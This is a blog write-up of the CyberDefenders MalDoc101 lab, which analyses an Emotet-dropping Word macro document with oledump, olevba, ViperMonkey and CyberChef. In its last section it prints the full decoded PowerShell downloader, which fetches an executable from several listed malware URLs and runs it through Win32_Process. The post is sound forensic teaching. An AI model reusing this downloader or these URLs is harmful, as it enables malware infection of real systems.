<!DOCTYPE html>
<html>

    <head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script>
        <title> [ CyberDefenders ] MalDoc101 (Document Analysis) &middot; user@james ~ $ </title>
        <meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">
<meta name="generator" content="Hugo 0.90.0" />




<script src="https://code.jquery.com/jquery-3.1.1.min.js"   integrity="sha256-hVVnYaiADRTO2PzUGmuLJr8BLUSjGIZsDYGmIJLv2b8="   crossorigin="anonymous"></script>


<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">

<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>


<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.2/css/all.css" integrity="sha384-fnmOCqbTlWIlj8LyTjo7mOUStjsKC4pOpQbqyi7RrhN7udi9RwhKkMHpvLbHG9Sr" crossorigin="anonymous">


<link rel="stylesheet" href="http://localhost:1313/css/nix.css">


<link rel="stylesheet" href="http://localhost:1313/css/styles.css">


<script src=http://localhost:1313/js/lunr-search.js></script>
<script src=http://localhost:1313/js/lunr.js></script>



<link rel="shortcut icon" href="http://localhost:1313/favicon.ico">



<link href="https://fonts.googleapis.com/css?family=Inconsolata%7COpen+Sans%7CConcert+One" rel="stylesheet">




<script async src="https://www.googletagmanager.com/gtag/js?id=G-4T1FV3DWGP"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-4T1FV3DWGP');
</script>



<script type="application/ld+json">
    {
        "@context" : "http://schema.org",
        "@type" : "BlogPosting",
        "mainEntityOfPage": {
             "@type": "WebPage",
             "@id": "http:\/\/localhost:1313\/"
        },
        "articleSection" : "articles",
        "name" : "[ CyberDefenders ] MalDoc101 (Document Analysis)",
        "headline" : "[ CyberDefenders ] MalDoc101 (Document Analysis)",
        "description" : "https:\/\/cyberdefenders.org\/labs\/51\nContents  Tools Used 1. Multiple streams contain macros in this document. Provide the number of highest one. 2. What event is used to begin the execution of the macros? 3. What malware family was this maldoc attempting to drop? 4. What stream is responsible for the storage of the base64-encoded string? 5. This document contains a user-form. Provide the name? 6. This document contains an obfuscated base64 encoded string; what value is used to pad (or obfuscate) this string?",
        "inLanguage" : "en-US",
        "author" : "",
        "creator" : "",
        "publisher": "",
        "accountablePerson" : "",
        "copyrightHolder" : "",
        "copyrightYear" : "2021",
        "datePublished": "2021-04-26 00:00:00 \u002b0000 UTC",
        "dateModified" : "2021-04-26 00:00:00 \u002b0000 UTC",
        "url" : "http:\/\/localhost:1313\/articles\/digital-forensics\/cyberdefenders-maldoc101\/",
        "wordCount" : "909",
        "keywords" : [ "Blog" ]
    }
</script>
    </head>

    <body>
        <header>
<nav class="navbar navbar-default navbar-fixed-top navbar-inverse font-header">
	<div class="container-fluid">
		<div class="navbar-header">
			<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar-collapse-1" aria-expanded="false">
				<span class="sr-only">Toggle navigation</span>
				<span class="icon-bar"></span>
				<span class="icon-bar"></span>
				<span class="icon-bar"></span>
			</button>
      <a class="navbar-brand" id="green-terminal" href='http://localhost:1313/'>
        @james ~ $
      </a>
		</div>

		
		<div class="collapse navbar-collapse" id="navbar-collapse-1">
			<ul class="nav navbar-nav navbar-right">
				<li>
					<a href='http://localhost:1313/'>/home/</a>
        </li>
        
				
				
				<li class="dropdown">
                    
            		<a href="http://localhost:1313/about">~/about</a>
            		
        		</li>
        		
				
				<li class="dropdown">
                    
            		<a href="http://localhost:1313/achievements">~/achievements</a>
            		
        		</li>
        		
				
				<li class="dropdown">
                    
                        <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">articles <span class="caret"></span></a>
                    <ul class="dropdown-menu">
                        
                    		<li>
                    		<a href="http://localhost:1313/articles/digital-forensics">~/digital-forensics</a>
				    		</li>
                		
                    		<li>
                    		<a href="http://localhost:1313/articles/offensive-security">~/offensive-security</a>
				    		</li>
                		
                    		<li>
                    		<a href="http://localhost:1313/articles/operational-technology">~/operational-technology</a>
				    		</li>
                		
                    		<li>
                    		<a href="http://localhost:1313/articles/reviews">~/reviews</a>
				    		</li>
                		
                    		<li>
                    		<a href="http://localhost:1313/articles/security-operations">~/security-operations</a>
				    		</li>
                		
            		</ul>
            		
        		</li>
        		
				
				<li class="dropdown">
                    
            		<a href="http://localhost:1313/notes">~/notes</a>
            		
        		</li>
        		
				
				<li class="dropdown">
                    
                        <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">projects <span class="caret"></span></a>
                    <ul class="dropdown-menu">
                        
                    		<li>
                    		<a href="http://localhost:1313/projects/arduino">~/arduino</a>
				    		</li>
                		
                    		<li>
                    		<a href="http://localhost:1313/projects/bash">~/bash</a>
				    		</li>
                		
                    		<li>
                    		<a href="http://localhost:1313/projects/python">~/python</a>
				    		</li>
                		
            		</ul>
            		
        		</li>
        		
				
				<li class="dropdown">
                    
            		<a href="http://localhost:1313/search">~/search</a>
            		
        		</li>
        		

			</ul>
		</div>
	</div>
</nav>
</header>

        <div class="flex-wrapper">
            <div class="container wrapper single">
                <ol class="breadcrumb">
  
  
    
  
    
  
    
  
  <li>
    
      <a href="/">james</a>
    
  </li>

  
  <li>
    
      <a href="/articles/">articles</a>
    
  </li>

  
  <li>
    
      <a href="/articles/digital-forensics/">digital forensics</a>
    
  </li>

  
  <li>
    
      [ CyberDefenders ] MalDoc101 (Document Analysis)
    
  </li>

</ol>



                <h1><a href="http://localhost:1313/articles/digital-forensics/cyberdefenders-maldoc101/">[ CyberDefenders ] MalDoc101 (Document Analysis)</a></h1>
                <span class="post-date">2021-04-26 </span>
                <div class="post-content">
                    <p><a href="https://cyberdefenders.org/labs/51" target="_blank">https://cyberdefenders.org/labs/51</a></p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#tools-used">Tools Used</a></li>
<li><a href="#1-multiple-streams-contain-macros-in-this-document-provide-the-number-of-highest-one">1. Multiple streams contain macros in this document. Provide the number of highest one.</a></li>
<li><a href="#2-what-event-is-used-to-begin-the-execution-of-the-macros">2. What event is used to begin the execution of the macros?</a></li>
<li><a href="#3-what-malware-family-was-this-maldoc-attempting-to-drop">3. What malware family was this maldoc attempting to drop?</a></li>
<li><a href="#4-what-stream-is-responsible-for-the-storage-of-the-base64-encoded-string">4. What stream is responsible for the storage of the base64-encoded string?</a></li>
<li><a href="#5-this-document-contains-a-user-form-provide-the-name">5. This document contains a user-form. Provide the name?</a></li>
<li><a href="#6-this-document-contains-an-obfuscated-base64-encoded-string--what-value-is-used-to-pad--or-obfuscate--this-string">6. This document contains an obfuscated base64 encoded string; what value is used to pad (or obfuscate) this string?</a></li>
<li><a href="#7-what-is-the-purpose-of-the-base64-encoded-string">7. What is the purpose of the base64 encoded string?</a></li>
<li><a href="#8-what-wmi-class-is-used-to-create-the-process-to-launch-the-trojan">8. What WMI class is used to create the process to launch the trojan?</a></li>
<li><a href="#9-multiple-domains-were-contacted-to-download-a-trojan-provide-first-fqdn-as-per-the-provided-hint">9. Multiple domains were contacted to download a trojan. Provide first FQDN as per the provided hint.</a></li>
</ul>
<h2 id="tools-used">Tools Used</h2>
<ol>
<li>oledump</li>
<li>olevba</li>
<li>vmonkey (ViperMonkey)</li>
<li>LibreOffice</li>
<li>CyberChef</li>
<li>sha256sum</li>
</ol>
<h2 id="1-multiple-streams-contain-macros-in-this-document-provide-the-number-of-highest-one">1. Multiple streams contain macros in this document. Provide the number of highest one.</h2>
<p>We can use <code>oledump</code> to dump all the streams:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ oledump.py sample.bin
1:       <span style="color:#ae81ff">114</span> <span style="color:#e6db74">&#39;\x01CompObj&#39;</span>
2:      <span style="color:#ae81ff">4096</span> <span style="color:#e6db74">&#39;\x05DocumentSummaryInformation&#39;</span>
3:      <span style="color:#ae81ff">4096</span> <span style="color:#e6db74">&#39;\x05SummaryInformation&#39;</span>
4:      <span style="color:#ae81ff">7119</span> <span style="color:#e6db74">&#39;1Table&#39;</span>
5:    <span style="color:#ae81ff">101483</span> <span style="color:#e6db74">&#39;Data&#39;</span>
6:       <span style="color:#ae81ff">581</span> <span style="color:#e6db74">&#39;Macros/PROJECT&#39;</span>
7:       <span style="color:#ae81ff">119</span> <span style="color:#e6db74">&#39;Macros/PROJECTwm&#39;</span>
8:     <span style="color:#ae81ff">12997</span> <span style="color:#e6db74">&#39;Macros/VBA/_VBA_PROJECT&#39;</span>
9:      <span style="color:#ae81ff">2112</span> <span style="color:#e6db74">&#39;Macros/VBA/__SRP_0&#39;</span>
10:       <span style="color:#ae81ff">190</span> <span style="color:#e6db74">&#39;Macros/VBA/__SRP_1&#39;</span>
11:       <span style="color:#ae81ff">532</span> <span style="color:#e6db74">&#39;Macros/VBA/__SRP_2&#39;</span>
12:       <span style="color:#ae81ff">156</span> <span style="color:#e6db74">&#39;Macros/VBA/__SRP_3&#39;</span>
13: M    <span style="color:#ae81ff">1367</span> <span style="color:#e6db74">&#39;Macros/VBA/diakzouxchouz&#39;</span>
14:       <span style="color:#ae81ff">908</span> <span style="color:#e6db74">&#39;Macros/VBA/dir&#39;</span>
15: M    <span style="color:#ae81ff">5705</span> <span style="color:#e6db74">&#39;Macros/VBA/govwiahtoozfaid&#39;</span>
16: m    <span style="color:#ae81ff">1187</span> <span style="color:#e6db74">&#39;Macros/VBA/roubhaol&#39;</span>
17:        <span style="color:#ae81ff">97</span> <span style="color:#e6db74">&#39;Macros/roubhaol/\x01CompObj&#39;</span>
18:       <span style="color:#ae81ff">292</span> <span style="color:#e6db74">&#39;Macros/roubhaol/\x03VBFrame&#39;</span>
19:       <span style="color:#ae81ff">510</span> <span style="color:#e6db74">&#39;Macros/roubhaol/f&#39;</span>
20:       <span style="color:#ae81ff">112</span> <span style="color:#e6db74">&#39;Macros/roubhaol/i05/\x01CompObj&#39;</span>
21:        <span style="color:#ae81ff">44</span> <span style="color:#e6db74">&#39;Macros/roubhaol/i05/f&#39;</span>
22:         <span style="color:#ae81ff">0</span> <span style="color:#e6db74">&#39;Macros/roubhaol/i05/o&#39;</span>
23:       <span style="color:#ae81ff">112</span> <span style="color:#e6db74">&#39;Macros/roubhaol/i07/\x01CompObj&#39;</span>
24:        <span style="color:#ae81ff">44</span> <span style="color:#e6db74">&#39;Macros/roubhaol/i07/f&#39;</span>
25:         <span style="color:#ae81ff">0</span> <span style="color:#e6db74">&#39;Macros/roubhaol/i07/o&#39;</span>
26:       <span style="color:#ae81ff">115</span> <span style="color:#e6db74">&#39;Macros/roubhaol/i09/\x01CompObj&#39;</span>
27:       <span style="color:#ae81ff">176</span> <span style="color:#e6db74">&#39;Macros/roubhaol/i09/f&#39;</span>
28:       <span style="color:#ae81ff">110</span> <span style="color:#e6db74">&#39;Macros/roubhaol/i09/i11/\x01CompObj&#39;</span>
29:        <span style="color:#ae81ff">40</span> <span style="color:#e6db74">&#39;Macros/roubhaol/i09/i11/f&#39;</span>
30:         <span style="color:#ae81ff">0</span> <span style="color:#e6db74">&#39;Macros/roubhaol/i09/i11/o&#39;</span>
31:       <span style="color:#ae81ff">110</span> <span style="color:#e6db74">&#39;Macros/roubhaol/i09/i12/\x01CompObj&#39;</span>
32:        <span style="color:#ae81ff">40</span> <span style="color:#e6db74">&#39;Macros/roubhaol/i09/i12/f&#39;</span>
33:         <span style="color:#ae81ff">0</span> <span style="color:#e6db74">&#39;Macros/roubhaol/i09/i12/o&#39;</span>
34:     <span style="color:#ae81ff">15164</span> <span style="color:#e6db74">&#39;Macros/roubhaol/i09/o&#39;</span>
35:        <span style="color:#ae81ff">48</span> <span style="color:#e6db74">&#39;Macros/roubhaol/i09/x&#39;</span>
36:       <span style="color:#ae81ff">444</span> <span style="color:#e6db74">&#39;Macros/roubhaol/o&#39;</span>
37:      <span style="color:#ae81ff">4096</span> <span style="color:#e6db74">&#39;WordDocument&#39;</span>
</code></pre></div><p>The highest VBA macro is number 16.</p>
<h2 id="2-what-event-is-used-to-begin-the-execution-of-the-macros">2. What event is used to begin the execution of the macros?</h2>
<p><code>olevba</code> is a good tool for getting more information about macros. I&rsquo;ve cropped the output.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ olevba sample.bin

<span style="color:#f92672">[</span>..<span style="color:#f92672">]</span>
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |Document_open       |Runs when the Word or Publisher document is  |
|          |                    |opened                                       |
<span style="color:#f92672">[</span>..<span style="color:#f92672">]</span>
</code></pre></div><p>Alternatively, we can open the malicious document and view (edit) the macro. I did so using LibreOffice Writer.</p>
<p><img src="../img/cyberdefenders-maldoc101-0.png" alt="cyberdefenders-maldoc101-0.png"></p>
<h2 id="3-what-malware-family-was-this-maldoc-attempting-to-drop">3. What malware family was this maldoc attempting to drop?</h2>
<p>One easy way is to compare the filehash to online databases such as URLhaus. Otherwise I&rsquo;d have to reverse-engineer the script, decipher the functionality, and cross-reference that with known malware.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ sha256sum sample.bin
d50d98dcc8b7043cb5c38c3de36a2ad62b293704e3cf23b0cd7450174df53fee  sample.bin
</code></pre></div><p><img src="../img/cyberdefenders-maldoc101-1.png" alt="cyberdefenders-maldoc101-1.png"></p>
<p>Looks like we&rsquo;re dealing with Emotet.</p>
<h2 id="4-what-stream-is-responsible-for-the-storage-of-the-base64-encoded-string">4. What stream is responsible for the storage of the base64-encoded string?</h2>
<p>We have the list of streams in question 1, but which one is it? Going back to the output we got from <code>olevba</code>, and looking through the streams, we can see there is one very long string (note I&rsquo;ve cropped the middle out):</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">-------------------------------------------------------------------------------
VBA FORM STRING IN <span style="color:#e6db74">&#39;sample.bin&#39;</span> - OLE stream: <span style="color:#e6db74">&#39;Macros/roubhaol/i09/o&#39;</span>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
ï¿½p2342772g3&amp;*gs7712ffvs626fqo2342772g3&amp;*gs7712ffvs626fqw2342772g3&amp;*gs7712ffvs626fqe2342772g3&amp;*gs7712ffvs626fqr2342772g3&amp;*gs7712ffvs626fqs2342772g3&amp;*gs7712ffvs626fqh2342772g3&amp;*gs7712ffvs626fqeL2342772g3&amp;*gs7712ffvs626fqL2342772g3&amp;*gs7712ffvs626fq 2342772g3&amp;*gs7712ffvs626fq-2342772g3&amp;*gs7712ffvs626fqe<span style="color:#f92672">[</span>..<span style="color:#f92672">]</span>2342772g3&amp;*gs7712ffvs626fqAHUAbA2342772g3&amp;*gs7712ffvs626fqBmAGkA2342772g3&amp;*gs7712ffvs626fqZQByAD2342772g3&amp;*gs7712ffvs626fq0AJwBm2342772g3&amp;*gs7712ffvs626fqAG8AcQ2342772g3&amp;*gs7712ffvs626fqB1AGwA2342772g3&amp;*gs7712ffvs626fqZQB2AG2342772g3&amp;*gs7712ffvs626fqMAYQBv2342772g3&amp;*gs7712ffvs626fqAGoAJw2342772g3&amp;*gs7712ffvs626fqA<span style="color:#f92672">=</span>
-------------------------------------------------------------------------------
</code></pre></div><p>It ends with <code>=</code>, which suggests it&rsquo;s base64 encoded. Checking our list of streams for <code>Macros/roubhaol/i09/o</code>, we find it&rsquo;s number 34.</p>
<h2 id="5-this-document-contains-a-user-form-provide-the-name">5. This document contains a user-form. Provide the name?</h2>
<p>From the screenshot in 2, we can see the form - <code>roubhaol</code>.</p>
<h2 id="6-this-document-contains-an-obfuscated-base64-encoded-string-what-value-is-used-to-pad-or-obfuscate-this-string">6. This document contains an obfuscated base64 encoded string; what value is used to pad (or obfuscate) this string?</h2>
<p>If we look carefully at the base64 string above (also use the hint from the challenge&hellip;) we can see there is a regularly-repeated string: <code>2342772g3&amp;*gs7712ffvs626fq</code>.</p>
<p>We can also look at the actual VBA script in LibreOffice.</p>
<p>There is line 43, which <code>Split</code>s the string based on that value:</p>
<p><img src="../img/cyberdefenders-maldoc101-2.png" alt="cyberdefenders-maldoc101-2.png"></p>
<p>There&rsquo;s also this on line 10:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">Dhaothkoebtheil <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;2342772g3&amp;*gs7712ffvs626fq2342772g3&amp;*gs7712ffvs626fqw2342772g3&amp;*gs7712ffvs626fq2342772g3&amp;*gs7712ffvs626fqin2342772g3&amp;*gs7712ffvs626fq2342772g3&amp;*gs7712ffvs626fqm2342772g3&amp;*gs7712ffvs626fqgm2342772g3&amp;*gs7712ffvs626fq2342772g3&amp;*gs7712ffvs626fqt2342772g3&amp;*gs7712ffvs626fq&#34;</span> + gooykadheoj + <span style="color:#e6db74">&#34;2342772g3&amp;*gs7712ffvs626fq2342772g3&amp;*gs7712ffvs626fq:w2342772g3&amp;*gs7712ffvs626fq2342772g3&amp;*gs7712ffvs626fqin2342772g3&amp;*gs7712ffvs626fq322342772g3&amp;*gs7712ffvs626fq_2342772g3&amp;*gs7712ffvs626fq&#34;</span> + roubhaol.joefwoefcheaw + <span style="color:#e6db74">&#34;2342772g3&amp;*gs7712ffvs626fqr2342772g3&amp;*gs7712ffvs626fqo2342772g3&amp;*gs7712ffvs626fq2342772g3&amp;*gs7712ffvs626fqc2342772g3&amp;*gs7712ffvs626fqes2342772g3&amp;*gs7712ffvs626fqs2342772g3&amp;*gs7712ffvs626fq&#34;</span>
</code></pre></div><p>Deleting the padding and we get:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">haothkoebtheil <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;winmgmt&#34;</span> + gooykadheoj + <span style="color:#e6db74">&#34;:win32_&#34;</span> + roubhaol.joefwoefcheaw + <span style="color:#e6db74">&#34;rocess&#34;</span>
</code></pre></div><p>If we ignore those variables we get <code>winmgmt[]:win32_[]rocess</code>, which leads us on to the next question.</p>
<h2 id="7-what-is-the-purpose-of-the-base64-encoded-string">7. What is the purpose of the base64 encoded string?</h2>
<p>We can run ViperMonkey to do some automated analysis of the file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ vmonkey -s sample.bin -p -o vmonkey_s.txt
</code></pre></div><p>ViperMonkey errors out quite a bit, but I got some useful information with <code>-s</code>, which strips out useless VB code (the <code>-p -o</code> is for <code>tee</code> and outputting to a file). <code>-c</code> for IOCs didn&rsquo;t give much before erroring out, same as no argument. I also used <code>-e</code>, which attempts to extract expressions. It also errored out.</p>
<p>Opening this in a graphical editor (to avoid line wrapping), we get some interesting information:</p>
<p><img src="../img/cyberdefenders-maldoc101-3.png" alt="cyberdefenders-maldoc101-3.png"></p>
<p><code>Win32_Process</code> is a well-known WMI class, and (as we can see above) is often related to PowerShell (in this case with <code>-e</code>, meaning encoded command). This is our answer.</p>
<p>Note this is also similar to what we found in question 6 - it seems <code>roubhaol.joefwoefcheaw</code> = P.</p>
<h2 id="8-what-wmi-class-is-used-to-create-the-process-to-launch-the-trojan">8. What WMI class is used to create the process to launch the trojan?</h2>
<p>See the previous question.</p>
<h2 id="9-multiple-domains-were-contacted-to-download-a-trojan-provide-first-fqdn-as-per-the-provided-hint">9. Multiple domains were contacted to download a trojan. Provide first FQDN as per the provided hint.</h2>
<p>Let&rsquo;s dig into that encoded PowerShell command. CyberChef will decode it:</p>
<p><img src="../img/cyberdefenders-maldoc101-4.png" alt="cyberdefenders-maldoc101-4.png"></p>
<p>And gives us this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$liechrouhwuw<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;vuacdouvcioxhaol&#39;</span>;<span style="color:#f92672">[</span>Net.ServicePointManager<span style="color:#f92672">]</span>::<span style="color:#e6db74">&#34;SE`cuRiTy`PRO`ToC`ol&#34;</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;tls12, tls11, tls&#39;</span>;$deichbeudreir <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;337&#39;</span>;$quoadgoijveum<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;duuvmoezhaitgoh&#39;</span>;$toehfethxohbaey<span style="color:#f92672">=</span>$env:userprofile+<span style="color:#e6db74">&#39;\&#39;</span>+$deichbeudreir+<span style="color:#e6db74">&#39;.exe&#39;</span>;$sienteed<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;quainquachloaz&#39;</span>;$reusthoas<span style="color:#f92672">=</span>.<span style="color:#f92672">(</span><span style="color:#e6db74">&#39;n&#39;</span>+<span style="color:#e6db74">&#39;ew-ob&#39;</span>+<span style="color:#e6db74">&#39;ject&#39;</span><span style="color:#f92672">)</span> nEt.weBclIenT;$jacleewyiqu<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;https://haoqunkong.com/bn/s9w4tgcjl_f6669ugu_w4bj/*https://www.techtravel.events/informationl/8lsjhrl6nnkwgyzsudzam_h3wng_a6v5/*http://digiwebmarketing.com/wp-admin/72t0jjhmv7takwvisfnz_eejvf_h6v2ix/*http://holfve.se/images/1ckw5mj49w_2k11px_d/*http://www.cfm.nl/_backup/yfhrmh6u0heidnwruwha2t4mjz6p_yxhyu390i6_q93hkh3ddm/&#39;</span>.<span style="color:#e6db74">&#34;s`PliT&#34;</span><span style="color:#f92672">([</span>char<span style="color:#f92672">]</span>42<span style="color:#f92672">)</span>;$seccierdeeth<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;duuzyeawpuaqu&#39;</span>;foreach<span style="color:#f92672">(</span>$geersieb in $jacleewyiqu<span style="color:#f92672">){</span>try<span style="color:#f92672">{</span>$reusthoas.<span style="color:#e6db74">&#34;dOWN`loA`dfi`Le&#34;</span><span style="color:#f92672">(</span>$geersieb, $toehfethxohbaey<span style="color:#f92672">)</span>;$buhxeuh<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;doeydeidquaijleuc&#39;</span>;If <span style="color:#f92672">((</span>.<span style="color:#f92672">(</span><span style="color:#e6db74">&#39;Get-&#39;</span>+<span style="color:#e6db74">&#39;Ite&#39;</span>+<span style="color:#e6db74">&#39;m&#39;</span><span style="color:#f92672">)</span> $toehfethxohbaey<span style="color:#f92672">)</span>.<span style="color:#e6db74">&#34;l`eNGTH&#34;</span> -ge 24751<span style="color:#f92672">)</span> <span style="color:#f92672">{([</span>wmiclass<span style="color:#f92672">]</span><span style="color:#e6db74">&#39;win32_Process&#39;</span><span style="color:#f92672">)</span>.<span style="color:#e6db74">&#34;C`ReaTe&#34;</span><span style="color:#f92672">(</span>$toehfethxohbaey<span style="color:#f92672">)</span>;$quoodteeh<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;jiafruuzlaolthoic&#39;</span>;break;$chigchienteiqu<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;yoowveihniej&#39;</span><span style="color:#f92672">}}</span>catch<span style="color:#f92672">{}}</span>$toizluulfier<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;foqulevcaoj&#39;</span>
</code></pre></div><p>It&rsquo;s still a but obfuscated, but we can easily see the URLs, and some is easily deobfuscated (e.g. <code>'Get-'+'Ite'+'m'</code> = <code>'Get-Item'</code>).</p>
<p>Let&rsquo;s look on URLhaus for one of these URLs:</p>
<p><img src="../img/cyberdefenders-maldoc101-5.png" alt="cyberdefenders-maldoc101-5.png"></p>

                </div>
                
                <div class="post-comments">
                    
                </div>
                
            </div>
            <footer class="footer text-center">
<p>Copyright &copy; 2022 James -
<span class="credit">
	Powered by
	<a target="_blank" href="https://gohugo.io">Hugo</a>
	and
	<a target="_blank" href="https://github.com/LordMathis/hugo-theme-nix/">Nix</a> theme.
</span>
</p>
</footer>

        </div>
    </body>
